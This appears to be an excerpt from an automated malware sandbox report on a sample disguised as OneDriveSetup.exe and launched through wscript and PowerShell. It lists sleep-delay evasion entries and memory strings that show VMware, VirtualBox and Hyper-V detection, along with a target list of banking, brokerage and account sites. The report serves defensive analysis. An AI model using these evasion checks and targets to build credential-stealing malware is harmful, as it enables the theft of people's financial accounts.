                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599233Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599119Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598875Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598755Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598405Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598297Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598187Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598078Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597969Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597855Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597625Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597184Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596846Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596280Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595719Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595593Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595477Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595364Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594969Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594409Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594172Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594062Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 593953Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 593844Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 593734Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 593625Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1853Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1543Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5324Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4426Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeWindow / User API: threadDelayed 4118Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeWindow / User API: threadDelayed 5710Jump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 7876Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep count: 5324 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep count: 4426 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 432Thread sleep count: 4118 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -599671s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -599233s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 432Thread sleep count: 5710 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -599119s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -598875s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -598755s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -598625s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -598405s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -598297s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -598187s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -598078s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -597969s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -597855s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -597734s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -597625s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -597515s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -597406s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -597297s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -597184s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -597078s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -596969s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -596846s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -596719s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -596609s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -596500s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -596390s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -596280s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -596047s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -595719s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -595593s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -595477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -595364s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -595094s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -594969s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -594859s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -594750s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -594640s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -594531s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -594409s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -594281s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -594172s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -594062s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -593953s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -593844s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -593734s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964Thread sleep time: -593625s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599233Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599119Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598875Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598755Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598405Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598297Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598187Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598078Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597969Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597855Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597625Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597184Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596846Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596280Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595719Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595593Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595477Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595364Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 595094Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594969Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594409Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594172Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 594062Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 593953Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 593844Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 593734Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 593625Jump to behavior
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vmwaretrat
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: wscript.exe, 00000000.00000002.1463305435.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1460132187.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:/B
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q#C:\windows\System32\vboxservice.exe
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: wscript.exe, 00000000.00000002.1463305435.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1460132187.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: wscript.exe, 00000000.00000002.1463135847.000002BB93710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1459674044.000002BB9370B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPfv
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vmwareuser
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q&C:\windows\System32\Drivers\VBoxSF.sys
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q+C:\windows\System32\Drivers\VMToolsHook.dll
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)C:\windows\System32\Drivers\VBoxGuest.sys
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'C:\windows\System32\Drivers\Vmmouse.sys
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtrayOC:\windows\System32\Drivers\Vmmouse.sysMC:\windows\System32\Drivers\vm3dgl.dllMC:\windows\System32\Drivers\vmtray.dllWC:\windows\System32\Drivers\VMToolsHook.dllUC:\windows\System32\Drivers\vmmousever.dllSC:\windows\System32\Drivers\VBoxMouse.sysSC:\windows\System32\Drivers\VBoxGuest.sysMC:\windows\System32\Drivers\VBoxSF.sysSC:\windows\System32\Drivers\VBoxVideo.sysGC:\windows\System32\vboxservice.exe
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
